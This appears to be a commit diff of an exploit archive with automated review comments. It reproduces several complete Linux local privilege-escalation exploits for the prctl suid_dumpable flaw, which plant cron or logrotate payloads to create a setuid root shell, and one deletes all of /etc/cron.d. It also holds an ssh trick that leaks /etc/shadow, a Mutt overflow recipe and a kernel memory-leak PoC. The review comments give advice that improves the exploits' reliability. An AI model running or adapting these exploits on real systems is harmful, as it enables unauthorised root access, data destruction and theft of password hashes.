prctl(PR_SET_DUMPABLE, 2); prctl(PR_SET_DUMPABLE, 2);
sleep(200); sleep(200);
exit(1); exit(1);
} }
kill(child, SIGSEGV); kill(child, SIGSEGV);
printf("[*] Sleeping for aprox. one minute (** please wait **)\n"); printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
sleep(62); sleep(62);
printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n"); printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
system("/tmp/sh -i"); system("/tmp/sh -i");
} }
// milw0rm.com [2006-07-11] // milw0rm.com [2006-07-11]

@ -1,127 +1,127 @@
/* Linux >= 2.6.13 prctl kernel exploit /* Linux >= 2.6.13 prctl kernel exploit
* *
* (C) Julien TINNES * (C) Julien TINNES
* *
* If you read the Changelog from 2.6.13 you've probably seen: * If you read the Changelog from 2.6.13 you've probably seen:
* [PATCH] setuid core dump * [PATCH] setuid core dump
* *
* This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process, * This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process,
* user setable argument to PR_SET_DUMPABLE. * user setable argument to PR_SET_DUMPABLE.
* *
* This flaw allows us to create a root owned coredump into any directory. * This flaw allows us to create a root owned coredump into any directory.
* This is trivially exploitable. * This is trivially exploitable.
* *
*/ */
#include <sys/types.h> #include <sys/types.h>
#include <sys/time.h> #include <sys/time.h>
#include <sys/resource.h> #include <sys/resource.h>
#include <sys/prctl.h> #include <sys/prctl.h>
#include <unistd.h> #include <unistd.h>
#include <stdio.h> #include <stdio.h>
#include <errno.h> #include <errno.h>
#include <signal.h> #include <signal.h>
#include <stdlib.h> #include <stdlib.h>
#include <time.h> #include <time.h>
#define CROND "/etc/cron.d" #define CROND "/etc/cron.d"
#define BUFSIZE 2048 #define BUFSIZE 2048
struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY}; struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};
char crontemplate[]= char crontemplate[]=
"#/etc/cron.d/core suid_dumpable exploit\n" "#/etc/cron.d/core suid_dumpable exploit\n"
"SHELL=/bin/sh\n" "SHELL=/bin/sh\n"
"PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n" "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
"#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n"; "#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n";
char cronstring[BUFSIZE]; char cronstring[BUFSIZE];
char fname[BUFSIZE]; char fname[BUFSIZE];
struct timeval te; struct timeval te;
void sh(int sn) { void sh(int sn) {
execl(fname, fname, (char *) NULL); execl(fname, fname, (char *) NULL);
} }
int main(int argc, char *argv[]) { int main(int argc, char *argv[]) {
int nw, pid; int nw, pid;
if (geteuid() == 0) { if (geteuid() == 0) {
printf("[+] getting root shell\n"); printf("[+] getting root shell\n");
setuid(0); setuid(0);
setgid(0); setgid(0);
if (execl("/bin/sh", "/bin/sh", (char *) NULL)) { if (execl("/bin/sh", "/bin/sh", (char *) NULL)) {
perror("[-] execle"); perror("[-] execle");
return 1; return 1;
} }
} }
printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n"); printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n");
/* get our file name */ /* get our file name */
if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) { if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) {
perror("[-] readlink"); perror("[-] readlink");
printf("This is not fatal, rewrite the exploit\n"); printf("This is not fatal, rewrite the exploit\n");
} }
if (signal(SIGUSR1, sh) == SIG_ERR) { if (signal(SIGUSR1, sh) == SIG_ERR) {
perror("[-] signal"); perror("[-] signal");
return 1; return 1;
} }
printf("[+] Installed signal handler\n"); printf("[+] Installed signal handler\n");
/* Let us create core files */ /* Let us create core files */
setrlimit(RLIMIT_CORE, &myrlimit); setrlimit(RLIMIT_CORE, &myrlimit);
if (chdir(CROND) == -1) { if (chdir(CROND) == -1) {
perror("[-] chdir"); perror("[-] chdir");
return 1; return 1;
} }
/* exploit the flaw */ /* exploit the flaw */
if (prctl(PR_SET_DUMPABLE, 2) == -1) { if (prctl(PR_SET_DUMPABLE, 2) == -1) {
perror("[-] prtctl"); perror("[-] prtctl");
printf("Is you kernel version >= 2.6.13 ?\n"); printf("Is you kernel version >= 2.6.13 ?\n");
return 1; return 1;
} }
printf("[+] We are suidsafe dumpable!\n"); printf("[+] We are suidsafe dumpable!\n");
/* Forge the string for our core dump */ /* Forge the string for our core dump */
nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid()); nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid());
if (nw >= sizeof(cronstring)) { if (nw >= sizeof(cronstring)) {
printf("[-] cronstring is too small\n"); printf("[-] cronstring is too small\n");
return 1; return 1;
} }
printf("[+] Malicious string forged\n"); printf("[+] Malicious string forged\n");
if ((pid=fork()) == -1) { if ((pid=fork()) == -1) {
perror("[-] fork"); perror("[-] fork");
return 1; return 1;
} }
if (pid == 0) { if (pid == 0) {
/* This is not the good way to do it ;) */ /* This is not the good way to do it ;) */
sleep(120); sleep(120);
exit(0); exit(0);
} }
/* SEGFAULT the child */ /* SEGFAULT the child */
printf("[+] Segfaulting child\n"); printf("[+] Segfaulting child\n");
if (kill(pid, 11) == -1) { if (kill(pid, 11) == -1) {
perror("[-] kill"); perror("[-] kill");
return 1; return 1;
} }
if (gettimeofday(&te, NULL) == 0) if (gettimeofday(&te, NULL) == 0)
printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60)); printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60));
sleep(120); sleep(120);
printf("[-] It looks like the exploit failed\n"); printf("[-] It looks like the exploit failed\n");
return 1; return 1;
} }
// milw0rm.com [2006-07-12] // milw0rm.com [2006-07-12]
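Review bot: the readlink() into `fname` near the top of the hunk does not NUL-terminate its result, so for an executable path of BUFSIZE bytes or more the later execl(fname, fname, NULL) in `sh()` reads past the buffer; read at most `sizeof(fname) - 1` bytes and terminate at the returned length. Two smaller points: `kill(pid, 11)` should use SIGSEGV instead of the magic number, and the perror() after execl("/bin/sh", ...) is labelled "execle", which is not the call that failed. As in the previous hunk, the old and new sides are identical, so this is a whitespace-only rewrite.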


@ -1,111 +1,111 @@
/* /*
* $Id: raptor_prctl.c,v 1.1 2006/07/13 14:21:43 raptor Exp $ * $Id: raptor_prctl.c,v 1.1 2006/07/13 14:21:43 raptor Exp $
* *
* raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability * raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability
* Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info> * Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
* *
* The suid_dumpable support in Linux kernel 2.6.13 up to versions before * The suid_dumpable support in Linux kernel 2.6.13 up to versions before
* 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial * 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial
* of service (disk consumption) and POSSIBILY (yeah, sure;) gain privileges * of service (disk consumption) and POSSIBILY (yeah, sure;) gain privileges
* via the PR_SET_DUMPABLE argument of the prctl function and a program that * via the PR_SET_DUMPABLE argument of the prctl function and a program that
* causes a core dump file to be created in a directory for which the user does * causes a core dump file to be created in a directory for which the user does
* not have permissions (CVE-2006-2451). * not have permissions (CVE-2006-2451).
* *
* Berlin, Sunday July 9th 2006: CAMPIONI DEL MONDO! CAMPIONI DEL MONDO! * Berlin, Sunday July 9th 2006: CAMPIONI DEL MONDO! CAMPIONI DEL MONDO!
* CAMPIONI DEL MONDO! (i was tempted to name this exploit "pajolo.c";)) * CAMPIONI DEL MONDO! (i was tempted to name this exploit "pajolo.c";))
* *
* Greets to Paul Starzetz and Roman Medina, who also exploited this ugly bug. * Greets to Paul Starzetz and Roman Medina, who also exploited this ugly bug.
* *
* NOTE. This exploit uses the Vixie's crontab /etc/cron.d attack vector: this * NOTE. This exploit uses the Vixie's crontab /etc/cron.d attack vector: this
* means that distributions that use a different configuration (namely Dillon's * means that distributions that use a different configuration (namely Dillon's
* crontab on Slackware Linux) can be vulnerable but not directly exploitable. * crontab on Slackware Linux) can be vulnerable but not directly exploitable.
* *
* Usage: * Usage:
* $ gcc raptor_prctl.c -o raptor_prctl -Wall * $ gcc raptor_prctl.c -o raptor_prctl -Wall
* [exploit must be dinamically linked] * [exploit must be dinamically linked]
* $ ./raptor_prctl * $ ./raptor_prctl
* [...] * [...]
* sh-3.00# * sh-3.00#
* *
* Vulnerable platforms: * Vulnerable platforms:
* Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default] * Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default]
*/ */
#include <stdio.h> #include <stdio.h>
#include <unistd.h> #include <unistd.h>
#include <stdlib.h> #include <stdlib.h>
#include <signal.h> #include <signal.h>
#include <sys/stat.h> #include <sys/stat.h>
#include <sys/resource.h> #include <sys/resource.h>
#include <sys/prctl.h> #include <sys/prctl.h>
#define INFO1 "raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability" #define INFO1 "raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability"
#define INFO2 "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>" #define INFO2 "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
char payload[] = /* commands to be executed by privileged crond */ char payload[] = /* commands to be executed by privileged crond */
"\nSHELL=/bin/sh\nPATH=/usr/bin:/usr/sbin:/sbin:/bin\n* * * * * root chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/cron.d/core\n"; "\nSHELL=/bin/sh\nPATH=/usr/bin:/usr/sbin:/sbin:/bin\n* * * * * root chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/cron.d/core\n";
char pwnage[] = /* build setuid() helper to circumvent bash checks */ char pwnage[] = /* build setuid() helper to circumvent bash checks */
"echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c"; "echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c";
int main(void) int main(void)
{ {
int pid, i; int pid, i;
struct rlimit corelimit; struct rlimit corelimit;
struct stat st; struct stat st;
/* print exploit information */ /* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* prepare the setuid() helper */ /* prepare the setuid() helper */
system(pwnage); system(pwnage);
/* set core size to unlimited */ /* set core size to unlimited */
corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit); setrlimit(RLIMIT_CORE, &corelimit);
/* let's do the PR_SET_DUMPABLE magic */ /* let's do the PR_SET_DUMPABLE magic */
if (!(pid = fork())) { if (!(pid = fork())) {
chdir("/etc/cron.d"); chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2); prctl(PR_SET_DUMPABLE, 2);
sleep(666); sleep(666);
exit(1); exit(1);
} }
kill(pid, SIGSEGV); kill(pid, SIGSEGV);
/* did it work? */ /* did it work? */
sleep(3); sleep(3);
if (stat("/etc/cron.d/core", &st) < 0) { if (stat("/etc/cron.d/core", &st) < 0) {
fprintf(stderr, "Error: Not vulnerable? See comments.\n"); fprintf(stderr, "Error: Not vulnerable? See comments.\n");
exit(1); exit(1);
} }
fprintf(stderr, "Ready to uncork the champagne? "); fprintf(stderr, "Ready to uncork the champagne? ");
fprintf(stderr, "Please wait a couple of minutes;)\n"); fprintf(stderr, "Please wait a couple of minutes;)\n");
/* wait for crond to execute our evil entry */ /* wait for crond to execute our evil entry */
for (i = 0; i < 124; i += 2) { for (i = 0; i < 124; i += 2) {
if (stat("/tmp/pwned", &st) < 0) { if (stat("/tmp/pwned", &st) < 0) {
fprintf(stderr, "\nError: Check /tmp/pwned!\n"); fprintf(stderr, "\nError: Check /tmp/pwned!\n");
exit(1); exit(1);
} }
if (st.st_uid == 0) if (st.st_uid == 0)
break; break;
fprintf(stderr, "."); fprintf(stderr, ".");
sleep(2); sleep(2);
} }
/* timeout reached? */ /* timeout reached? */
if (i > 120) { if (i > 120) {
fprintf(stderr, "\nTimeout: Check /tmp/pwned!\n"); fprintf(stderr, "\nTimeout: Check /tmp/pwned!\n");
exit(1); exit(1);
} }
/* total pwnage */ /* total pwnage */
fprintf(stderr, "CAMPIONI DEL MONDO!\n\n"); fprintf(stderr, "CAMPIONI DEL MONDO!\n\n");
system("/tmp/pwned"); system("/tmp/pwned");
exit(0); exit(0);
} }
// milw0rm.com [2006-07-13] // milw0rm.com [2006-07-13]
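Review bot: the timeout test after the polling loop is off by one: the loop is `for (i = 0; i < 124; i += 2)` and breaks when `st.st_uid == 0`, so a hit on the last iteration leaves i == 122 and `if (i > 120)` reports "Timeout" even though the file is already root-owned; compare against the loop bound (i >= 124) or record success in a flag. The `pwnage` command string also relies on the bash-only redirection `&>/dev/null`, but system() runs /bin/sh, and a POSIX sh parses that as `&` (background the gcc job) followed by `>/dev/null`; `>/dev/null 2>&1` is the portable form.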

View file

@ -1,64 +1,64 @@
#!/bin/sh #!/bin/sh
# #
# PRCTL local root exp By: Sunix # PRCTL local root exp By: Sunix
# + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp # + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp
# tested on Intel(R) Xeon(TM) CPU 3.20GHz # tested on Intel(R) Xeon(TM) CPU 3.20GHz
# kernel 2.6.9-22.ELsmp # kernel 2.6.9-22.ELsmp
# maybe others ... # maybe others ...
# Tx to drayer & RoMaNSoFt for their clear code... # Tx to drayer & RoMaNSoFt for their clear code...
# #
# zmia23@yahoo.com # zmia23@yahoo.com
cat > /tmp/getsuid.c << __EOF__ cat > /tmp/getsuid.c << __EOF__
#include <stdio.h> #include <stdio.h>
#include <sys/time.h> #include <sys/time.h>
#include <sys/resource.h> #include <sys/resource.h>
#include <unistd.h> #include <unistd.h>
#include <linux/prctl.h> #include <linux/prctl.h>
#include <stdlib.h> #include <stdlib.h>
#include <sys/types.h> #include <sys/types.h>
#include <signal.h> #include <signal.h>
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n"; char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n";
int main() { int main() {
int child; int child;
struct rlimit corelimit; struct rlimit corelimit;
corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit); setrlimit(RLIMIT_CORE, &corelimit);
if ( !( child = fork() )) { if ( !( child = fork() )) {
chdir("/etc/cron.d"); chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2); prctl(PR_SET_DUMPABLE, 2);
sleep(200); sleep(200);
exit(1); exit(1);
} }
kill(child, SIGSEGV); kill(child, SIGSEGV);
sleep(120); sleep(120);
} }
__EOF__ __EOF__
cat > /tmp/s.c << __EOF__ cat > /tmp/s.c << __EOF__
#include<stdio.h> #include<stdio.h>
main(void) main(void)
{ {
setgid(0); setgid(0);
setuid(0); setuid(0);
system("/bin/sh"); system("/bin/sh");
system("rm -rf /tmp/s"); system("rm -rf /tmp/s");
system("rm -rf /etc/cron.d/*"); system("rm -rf /etc/cron.d/*");
return 0; return 0;
} }
__EOF__ __EOF__
echo "wait aprox 4 min to get sh" echo "wait aprox 4 min to get sh"
cd /tmp cd /tmp
cc -o s s.c cc -o s s.c
cc -o getsuid getsuid.c cc -o getsuid getsuid.c
./getsuid ./getsuid
./s ./s
rm -rf getsuid* rm -rf getsuid*
rm -rf s.c rm -rf s.c
rm -rf prctl.sh rm -rf prctl.sh
# milw0rm.com [2006-07-14] # milw0rm.com [2006-07-14]
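Review bot: the helper written to /tmp/s.c runs `rm -rf /etc/cron.d/*` after the shell exits, which deletes every system cron.d entry rather than only the `core` file this script creates; restrict the cleanup to /etc/cron.d/core, as the other prctl exploits in this commit do. getsuid.c includes `<linux/prctl.h>`, which defines the PR_* constants but no prototype for prctl(), so it compiles only through an implicit declaration; `<sys/prctl.h>` is the libc header. s.c likewise declares `main(void)` with an implicit int and calls setgid/setuid/system without `<unistd.h>` and `<stdlib.h>`, and the closing `rm -rf prctl.sh` assumes both the script's own filename and that it sits in /tmp after the `cd /tmp`.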


@ -1,108 +1,108 @@
/* /*
* $Id: raptor_prctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $ * $Id: raptor_prctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $
* *
* raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate) * raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)
* Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info> * Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
* *
* The suid_dumpable support in Linux kernel 2.6.13 up to versions before * The suid_dumpable support in Linux kernel 2.6.13 up to versions before
* 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial * 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial
* of service (disk consumption) and POSSIBLY (yeah, sure;) gain privileges via * of service (disk consumption) and POSSIBLY (yeah, sure;) gain privileges via
* the PR_SET_DUMPABLE argument of the prctl function and a program that causes * the PR_SET_DUMPABLE argument of the prctl function and a program that causes
* a core dump file to be created in a directory for which the user does not * a core dump file to be created in a directory for which the user does not
* have permissions (CVE-2006-2451). * have permissions (CVE-2006-2451).
* *
* This exploit uses the logrotate attack vector: of course, you must be able * This exploit uses the logrotate attack vector: of course, you must be able
* to chdir() into the /etc/logrotate.d directory in order to exploit the * to chdir() into the /etc/logrotate.d directory in order to exploit the
* vulnerability. I've experimented a bit with other attack vectors as well, * vulnerability. I've experimented a bit with other attack vectors as well,
* with no luck: at (/var/spool/atjobs/) uses file name information to * with no luck: at (/var/spool/atjobs/) uses file name information to
* establish execution time, /etc/cron.hourly|daily|weekly|monthly want +x * establish execution time, /etc/cron.hourly|daily|weekly|monthly want +x
* permissions, xinetd (/etc/xinetd.d) puked out the crafted garbage-filled * permissions, xinetd (/etc/xinetd.d) puked out the crafted garbage-filled
* coredump (see also http://www.0xdeadbeef.info/exploits/raptor_prctl.c). * coredump (see also http://www.0xdeadbeef.info/exploits/raptor_prctl.c).
* *
* Thanks to Solar Designer for the interesting discussion on attack vectors. * Thanks to Solar Designer for the interesting discussion on attack vectors.
* *
* NOTE THAT IN ORDER TO WORK THIS EXPLOIT *MUST* BE STATICALLY LINKED!!! * NOTE THAT IN ORDER TO WORK THIS EXPLOIT *MUST* BE STATICALLY LINKED!!!
* *
* Usage: * Usage:
* $ gcc raptor_prctl2.c -o raptor_prctl2 -static -Wall * $ gcc raptor_prctl2.c -o raptor_prctl2 -static -Wall
* [exploit must be statically linked] * [exploit must be statically linked]
* $ ./raptor_prctl2 * $ ./raptor_prctl2
* [please wait until logrotate is run] * [please wait until logrotate is run]
* $ ls -l /tmp/pwned * $ ls -l /tmp/pwned
* -rwsr-xr-x 1 root users 7221 2006-07-18 13:32 /tmp/pwned * -rwsr-xr-x 1 root users 7221 2006-07-18 13:32 /tmp/pwned
* $ /tmp/pwned * $ /tmp/pwned
* sh-3.00# id * sh-3.00# id
* uid=0(root) gid=0(root) groups=16(dialout),33(video),100(users) * uid=0(root) gid=0(root) groups=16(dialout),33(video),100(users)
* sh-3.00# * sh-3.00#
* [don't forget to delete /tmp/pwned!] * [don't forget to delete /tmp/pwned!]
* *
* Vulnerable platforms: * Vulnerable platforms:
* Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default] * Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default]
*/ */
#include <stdio.h> #include <stdio.h>
#include <unistd.h> #include <unistd.h>
#include <stdlib.h> #include <stdlib.h>
#include <signal.h> #include <signal.h>
#include <sys/stat.h> #include <sys/stat.h>
#include <sys/resource.h> #include <sys/resource.h>
#include <sys/prctl.h> #include <sys/prctl.h>
#define INFO1 "raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)" #define INFO1 "raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)"
#define INFO2 "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>" #define INFO2 "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
char payload[] = /* commands to be executed by privileged logrotate */ char payload[] = /* commands to be executed by privileged logrotate */
"\n/var/log/core {\n daily\n size=0\n firstaction\n chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/logrotate.d/core; rm -f /var/log/core*\n endscript\n}\n"; "\n/var/log/core {\n daily\n size=0\n firstaction\n chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/logrotate.d/core; rm -f /var/log/core*\n endscript\n}\n";
char pwnage[] = /* build setuid() helper to circumvent bash checks */ char pwnage[] = /* build setuid() helper to circumvent bash checks */
"echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c"; "echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c";
int main(void) int main(void)
{ {
int pid; int pid;
struct rlimit corelimit; struct rlimit corelimit;
struct stat st; struct stat st;
/* print exploit information */ /* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* prepare the setuid() helper */ /* prepare the setuid() helper */
system(pwnage); system(pwnage);
/* set core size to unlimited */ /* set core size to unlimited */
corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit); setrlimit(RLIMIT_CORE, &corelimit);
/* let's create a fake logfile in /var/log */ /* let's create a fake logfile in /var/log */
if (!(pid = fork())) { if (!(pid = fork())) {
chdir("/var/log"); chdir("/var/log");
prctl(PR_SET_DUMPABLE, 2); prctl(PR_SET_DUMPABLE, 2);
sleep(666); sleep(666);
exit(1); exit(1);
} }
kill(pid, SIGSEGV); kill(pid, SIGSEGV);
/* let's do the PR_SET_DUMPABLE magic */ /* let's do the PR_SET_DUMPABLE magic */
if (!(pid = fork())) { if (!(pid = fork())) {
chdir("/etc/logrotate.d"); chdir("/etc/logrotate.d");
prctl(PR_SET_DUMPABLE, 2); prctl(PR_SET_DUMPABLE, 2);
sleep(666); sleep(666);
exit(1); exit(1);
} }
kill(pid, SIGSEGV); kill(pid, SIGSEGV);
/* did it work? */ /* did it work? */
sleep(3); sleep(3);
if ((stat("/var/log/core", &st) < 0) || if ((stat("/var/log/core", &st) < 0) ||
(stat("/etc/logrotate.d/core", &st) < 0)) { (stat("/etc/logrotate.d/core", &st) < 0)) {
fprintf(stderr, "Error: Not vulnerable? See comments.\n"); fprintf(stderr, "Error: Not vulnerable? See comments.\n");
exit(1); exit(1);
} }
/* total pwnage */ /* total pwnage */
fprintf(stderr, "Please wait until logrotate is run and check /tmp/pwned;)\n"); fprintf(stderr, "Please wait until logrotate is run and check /tmp/pwned;)\n");
exit(0); exit(0);
} }
// milw0rm.com [2006-07-18] // milw0rm.com [2006-07-18]
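Review bot: both children are forked into the same `pid` variable and neither is ever waited for, so after each kill(pid, SIGSEGV) they linger as zombies until the parent exits, and a fork() failure (-1) is again taken as the parent path, turning the kill into kill(-1, SIGSEGV); test fork() for -1 and waitpid() each child before the two stat() checks. The header insists the binary MUST be statically linked, but nothing in the code or the "Not vulnerable? See comments." message points a user there; mention in the error text how to verify the build (for example with `file` on the binary) so the failure cause is distinguishable.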


@ -143,6 +143,6 @@ int main( int argc, char * argv[] )
execve( execve_argv[0], execve_argv, NULL ); execve( execve_argv[0], execve_argv, NULL );
return( -1 ); return( -1 );
} }
// milw0rm.com [2000-12-02] // milw0rm.com [2000-12-02]


@ -64,6 +64,6 @@ $buffer .= $shellcode;
# then: export DISPLAY=your-ip:0.0 - and execute the exploit. # then: export DISPLAY=your-ip:0.0 - and execute the exploit.
exec("/usr/X11R6/bin/seyon -noemulator \"$buffer\""); exec("/usr/X11R6/bin/seyon -noemulator \"$buffer\"");
# milw0rm.com [2001-01-15] # milw0rm.com [2001-01-15]


@ -27,6 +27,6 @@ echo "[*] krochos@linuxmail.org"
sleep 1 sleep 1
echo "[*] export RESOLV_HOST_CONF=/etc/shadow" echo "[*] export RESOLV_HOST_CONF=/etc/shadow"
ssh lt 2>/tmp/.resolv ssh lt 2>/tmp/.resolv
cat /tmp/.resolv | cut -d"\`" -f5,2 | awk -F"\'" '{print $1} ' cat /tmp/.resolv | cut -d"\`" -f5,2 | awk -F"\'" '{print $1} '
# milw0rm.com [2001-01-25] # milw0rm.com [2001-01-25]
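Review bot: `ssh lt 2>/tmp/.resolv` writes the leaked /etc/shadow lines to a fixed, predictable filename in a world-writable directory and never removes it, so the extracted hashes stay on disk readable by anyone with access to /tmp; create the file with mktemp (or under $HOME with restrictive permissions) and delete it once the awk pipeline has consumed it. The `cat /tmp/.resolv | cut ...` can also read the file directly with `cut ... < /tmp/.resolv`.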

platforms/linux/local/30093.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/24192/info
Mutt is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before using it in a memory copy operation.
An attacker can exploit this issue to execute arbitrary code with the with the privileges of the victim. Failed exploit attempts will result in a denial of service.
# USERNAME=$(perl -e 'print "a" x 31')
# useradd -c '&&&&&&&&& your-favourite-ascii-shellcode-here' $USERNAME
# echo alias billg $USERNAME >~/.muttrc
# mutt billg
# Segmentation fault (core dumped)
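Review bot: the second paragraph of the new file carries a duplicated phrase ("with the with the privileges"), and the reproduction steps mix privilege levels without saying so: `useradd` requires root, while the `~/.muttrc` alias and `mutt billg` run as the affected user, so state which step runs under which account. The entry also gives no affected Mutt versions beyond the SecurityFocus link; adding them (if known) would make the file self-contained like the other advisories in this tree.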


@ -1,39 +1,39 @@
#include <netinet/in.h> #include <netinet/in.h>
#include <stdio.h> #include <stdio.h>
#include <sys/types.h> #include <sys/types.h>
#include <sys/socket.h> #include <sys/socket.h>
#include <net/if.h> #include <net/if.h>
#include <sys/mman.h> #include <sys/mman.h>
#include <linux/net.h> #include <linux/net.h>
#define BUFSIZE 0x10000000 #define BUFSIZE 0x10000000
int main(int argc, char *argv[]) int main(int argc, char *argv[])
{ {
void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE, void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (mem == (void*)-1) { if (mem == (void*)-1) {
printf("Alloc failed\n"); printf("Alloc failed\n");
return -1; return -1;
} }
/* SOCK_DCCP, IPPROTO_DCCP */ /* SOCK_DCCP, IPPROTO_DCCP */
int s = socket(PF_INET, 6, 33); int s = socket(PF_INET, 6, 33);
if (s == -1) { if (s == -1) {
fprintf(stderr, "socket failure!\n"); fprintf(stderr, "socket failure!\n");
return 1; return 1;
} }
/* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */ /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */
int len = BUFSIZE; int len = BUFSIZE;
int x = getsockopt(s, 269, 11, mem, &len); int x = getsockopt(s, 269, 11, mem, &len);
if (x == -1) if (x == -1)
perror("SETSOCKOPT"); perror("SETSOCKOPT");
else else
printf("SUCCESS\n"); printf("SUCCESS\n");
write(1, mem, BUFSIZE); write(1, mem, BUFSIZE);
return 0; return 0;
} }
// milw0rm.com [2007-03-28] // milw0rm.com [2007-03-28]
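Review bot: the final `write(1, mem, BUFSIZE)` dumps the entire 256 MiB mapping regardless of how much getsockopt() actually filled in; `len` is updated by the call and is the count that should be written. `len` is also declared `int` while getsockopt() takes a `socklen_t *`, and perror("SETSOCKOPT") labels a getsockopt() failure. The file lacks `<unistd.h>` for write(), and the literal 6/33 and 269/11 arguments are already named in the comments (SOCK_DCCP, IPPROTO_DCCP, SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV), so the symbolic constants would be clearer where the headers provide them.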


@ -1,84 +1,84 @@
/* /*
* Linux Kernel IPV6_Getsockopt_Sticky Memory Leak Proof Of Concept * Linux Kernel IPV6_Getsockopt_Sticky Memory Leak Proof Of Concept
